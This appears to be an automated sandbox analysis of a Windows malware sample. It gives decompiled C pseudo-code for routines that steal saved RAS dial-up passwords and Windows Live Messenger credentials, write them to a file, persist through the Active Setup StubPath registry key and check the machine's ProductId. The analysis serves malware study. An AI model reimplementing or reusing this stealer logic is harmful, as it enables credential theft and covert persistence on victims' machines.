                                    				void* _t181;
                                    				CHAR* _t185;
                                    				CHAR* _t190;
                                    				void* _t199;
                                    				void* _t201;
                                    				int _t215;
                                    				intOrPtr* _t216;
                                    				signed int* _t222;
                                    				void* _t223;
                                    				intOrPtr _t225;
                                    				intOrPtr _t230;
                                    				CHAR* _t253;
                                    				void* _t254;
                                    				signed int _t256;
                                    				void* _t259;
                                    
                                    				_t255 = __esi;
                                    				_t252 = __edi;
                                    				_t211 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v3288 = 0;
                                    				_v3292 = 0;
                                    				_v3028 = 0;
                                    				_v3024 = 0;
                                    				_v24 = 0;
                                    				_v28 = 0;
                                    				_v32 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_v48 = 0;
                                    				_v8 = __eax;
                                    				_push(_t259);
                                    				_push(0x40861b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t259 + 0xfffff328;
                                    				E00401AC0(_v8);
                                    				_v20 = E00407FF0();
                                    				if(_v20 != 0) {
                                    					_push(_v20);
                                    					E00402FBC();
                                    					 *_v24 = 0x108;
                                    					_v12 = 0x108 * _v20;
                                    					_push( &_v20);
                                    					_push( &_v12);
                                    					_t130 = _v24;
                                    					_push(_t130);
                                    					_push(0);
                                    					_push(0);
                                    					L00407B84();
                                    					if(_t130 == 0) {
                                    						_v200.dwOSVersionInfoSize = 0x94;
                                    						GetVersionExA( &_v200);
                                    						E00402074( &_v28, 0x105);
                                    						E00402074( &_v32, 0x105);
                                    						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    							_push(0);
                                    							_push(0x1a);
                                    							_t199 = E00401F9C( &_v28);
                                    							_push(_t199);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t267 = _t199;
                                    							if(_t199 != 0) {
                                    								E00407F4C(_v28,  &_v3024, _t267);
                                    								E00401B58( &_v28, _v3024);
                                    							}
                                    							_push(0);
                                    							_push(0x23);
                                    							_t201 = E00401F9C( &_v32);
                                    							_push(_t201);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t268 = _t201;
                                    							if(_t201 != 0) {
                                    								E00407F4C(_v32,  &_v3028, _t268);
                                    								E00401B58( &_v32, _v3028);
                                    							}
                                    							E00407E40(_t211, 1, _t252, _t255, _t268);
                                    						}
                                    						_v36 = 0xffffffff;
                                    						_t138 = _v20 - 1;
                                    						if(_t138 >= 0) {
                                    							_v52 = _t138 + 1;
                                    							_t256 = 0;
                                    							do {
                                    								_v1252 = 0x41c;
                                    								_t214 = (_t256 << 5) + _t256;
                                    								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
                                    								_push( &_v36);
                                    								_push( &_v1252);
                                    								_push(0);
                                    								L00407B8C();
                                    								_v12 = 0x6e8;
                                    								E00401414( &_v3020, _v12);
                                    								_v3020 = _v12;
                                    								_t222 =  &_v3020;
                                    								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
                                    								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    									if( *_v28 != 0) {
                                    										L15:
                                    										E00401CAC( &_v40,  &_v1248);
                                    										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
                                    										_t167 = E00401F9C( &_v28);
                                    										_t253 = E00401F48(_v40);
                                    										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
                                    										if(_t215 == 0) {
                                    											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
                                    										}
                                    										if(_t215 == 0) {
                                    											_t190 = E00401F9C( &_v28);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
                                    										}
                                    										if(_t215 == 0) {
                                    											_t185 = E00401F9C( &_v32);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
                                    										}
                                    										if(_t215 > 0) {
                                    											E00402BC0( &_v3284, _t215, 0);
                                    											E00401D18( &_v48,  &_v3284, 0);
                                    											_t254 = 0x100;
                                    											_t216 = 0x40e9bc;
                                    											do {
                                    												E00401E94( *_t216, _v48);
                                    												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
                                    													_t87 = _t216 + 4; // 0x0
                                    													_push(E00401D50( *_t87));
                                    													_t88 = _t216 + 4; // 0x0
                                    													_t181 = E00401F48( *_t88);
                                    													_pop(_t223);
                                    													E00408038( &_v476, _t223, _t181);
                                    												}
                                    												_t216 = _t216 + 8;
                                    												_t254 = _t254 - 1;
                                    											} while (_t254 != 0);
                                    										}
                                    									} else {
                                    										_t274 =  *_v32;
                                    										if( *_v32 != 0) {
                                    											goto L15;
                                    										}
                                    									}
                                    								}
                                    								if( &_v733 != 0 &&  &_v476 != 0) {
                                    									_push( *_v8);
                                    									_push("RAS Passwords |");
                                    									E00401CAC( &_v3288,  &_v733);
                                    									_push(_v3288);
                                    									_push(0x40865c);
                                    									E00401CAC( &_v3292,  &_v476);
                                    									_push(_v3292);
                                    									_push(0x40865c);
                                    									_push(0x408668);
                                    									E00401E10();
                                    								}
                                    								_t256 = _t256 + 1;
                                    								_t100 =  &_v52;
                                    								 *_t100 = _v52 - 1;
                                    							} while ( *_t100 != 0);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t225);
                                    				 *[fs:eax] = _t225;
                                    				_push(E00408622);
                                    				E00401AE4( &_v3292, 2);
                                    				E00401AE4( &_v3028, 2);
                                    				E00401AE4( &_v48, 3);
                                    				E00401AE4( &_v32, 2);
                                    				_t230 =  *0x408214; // 0x408218
                                    				return E00402FC8( &_v24, _t230);
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				struct HINSTANCE__* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				void* _t47;
                                    				intOrPtr* _t70;
                                    				void* _t74;
                                    				intOrPtr _t76;
                                    				intOrPtr _t78;
                                    				signed int _t90;
                                    				void* _t91;
                                    				intOrPtr _t93;
                                    
                                    				_t89 = __esi;
                                    				_t70 = __eax;
                                    				 *[fs:eax] = _t93;
                                    				E00401AC0(__eax);
                                    				_v16 = LoadLibraryA("advapi32.dll");
                                    				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
                                    				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
                                    				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
                                    				if(_v12 != 0) {
                                    					_t47 = _v12 - 1;
                                    					if(_t47 >= 0) {
                                    						_v20 = _t47 + 1;
                                    						_t90 = 0;
                                    						do {
                                    							_push( *_t70);
                                    							_push("Messenger|");
                                    							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
                                    							_push(_v24);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							_push( *_t70);
                                    							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
                                    							_push(_v32);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							E00401CAC(_t70, E00401F48(_v28));
                                    							_t90 = _t90 + 1;
                                    							_t21 =  &_v20;
                                    							 *_t21 = _v20 - 1;
                                    							_t97 =  *_t21;
                                    						} while ( *_t21 != 0);
                                    					}
                                    					FreeLibrary(_v16);
                                    					_push(E00401D50( *_t70));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "xxxyyyzzz.dat");
                                    					_pop(_t74);
                                    					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
                                    				}
                                    				_pop(_t76);
                                    				 *[fs:eax] = _t76;
                                    				_push(E00409E78);
                                    				E00401AE4( &_v36, 4);
                                    				_t78 =  *0x409bec; // 0x409bf0
                                    				return E00402FC8( &_v8, _t78);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				CHAR* _t11;
                                    				struct HINSTANCE__* _t12;
                                    				CHAR* _t18;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t24;
                                    				struct HINSTANCE__* _t25;
                                    				CHAR* _t30;
                                    				struct HINSTANCE__* _t31;
                                    				intOrPtr _t44;
                                    				intOrPtr _t51;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_t48 = __eax;
                                    				_push(_t51);
                                    				_push(0x408182);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				if( *0x40d094 != 0) {
                                    					if( *0x40d098 == 0) {
                                    						E00401D9C( &_v12, 0x4081ac, __eax);
                                    						_t11 = E00401F48(_v12);
                                    						_t12 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t12, _t11);
                                    					} else {
                                    						_t18 = E00401F48(__eax);
                                    						_t19 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t19, _t18);
                                    					}
                                    					L11:
                                    					_pop(_t44);
                                    					 *[fs:eax] = _t44;
                                    					_push(E00408189);
                                    					return E00401AE4( &_v12, 2);
                                    				}
                                    				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
                                    				if( *0x40e9b8 == 0) {
                                    					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
                                    					L5:
                                    					if( *0x40e9b8 != 0) {
                                    						_t24 = E00401F48(_t48);
                                    						_t25 =  *0x40e9b8; // 0x0
                                    						if(GetProcAddress(_t25, _t24) != 0) {
                                    							 *0x40d094 = 1;
                                    							 *0x40d098 = 1;
                                    						}
                                    					}
                                    					goto L11;
                                    				}
                                    				E00401D9C( &_v8, 0x4081ac, _t48);
                                    				_t30 = E00401F48(_v8);
                                    				_t31 =  *0x40e9b8; // 0x0
                                    				if(GetProcAddress(_t31, _t30) == 0) {
                                    					goto L5;
                                    				} else {
                                    					 *0x40d094 = 1;
                                    					goto L11;
                                    				}
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
                                    				struct HINSTANCE__* _t2;
                                    				struct HINSTANCE__* _t4;
                                    				struct HINSTANCE__* _t6;
                                    				void* _t8;
                                    				struct HRSRC__* _t15;
                                    				void* _t16;
                                    				long _t22;
                                    				void* _t24;
                                    
                                    				_t24 = __eax;
                                    				_t2 =  *0x40e670; // 0x400000
                                    				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
                                    				_t4 =  *0x40e670; // 0x400000
                                    				_t22 = SizeofResource(_t4, _t15);
                                    				_t6 =  *0x40e670; // 0x400000
                                    				_t16 = LoadResource(_t6, _t15);
                                    				_t8 = LockResource(_t16);
                                    				_t23 = _t8;
                                    				if(_t8 != 0) {
                                    					E00402074(_t24, _t22 - 1);
                                    					E00403730(E00401F9C(_t24), _t23);
                                    					return FreeResource(_t16);
                                    				}
                                    				return _t8;
                                    			}

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405334() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
                                    					if( &_v264 == "55274-640-2673064-23950") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}

                                    Instruction addresses: 0x0040533b 0x00405353 0x00405355 0x00405375 0x00405383 0x00405385 0x00405385 0x00405383 0x0040538b 0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • ProductId, xrefs: 0040536B
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                    				void* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				void* _t26;
                                    				intOrPtr _t27;
                                    				void* _t28;
                                    				void* _t43;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				intOrPtr _t62;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t43 = __ecx;
                                    				_push(_t62);
                                    				_push(0x40698a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62;
                                    				E00401CAC( &_v16, __edx);
                                    				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
                                    				E00401CAC( &_v20, _t43);
                                    				_t26 = E00401D50(_v20);
                                    				_t27 =  *0x40d090; // 0x0
                                    				_t28 = E00401D50(_t27);
                                    				E00401CAC( &_v24, _t43);
                                    				_t53 =  *0x40d090; // 0x0
                                    				E00401D58( &_v24, _t53);
                                    				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
                                    				RegCloseKey(_v8);
                                    				_pop(_t54);
                                    				 *[fs:eax] = _t54;
                                    				_push(E00406991);
                                    				return E00401AE4( &_v24, 4);
                                    			}

                                    Instruction addresses: 0x004068b7 0x004068b9 0x004068bb 0x004068bd 0x004068bf 0x004068c3 0x004068c9 0x004068ca 0x004068cf 0x004068d2 0x004068ea 0x004068fa 0x0040690d 0x00406917 0x0040691f 0x00406926 0x0040692b 0x00406938 0x00406940 0x00406946 0x00406961 0x0040696a 0x00406971 0x00406974 0x00406977 0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
                                    				char _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _v20;
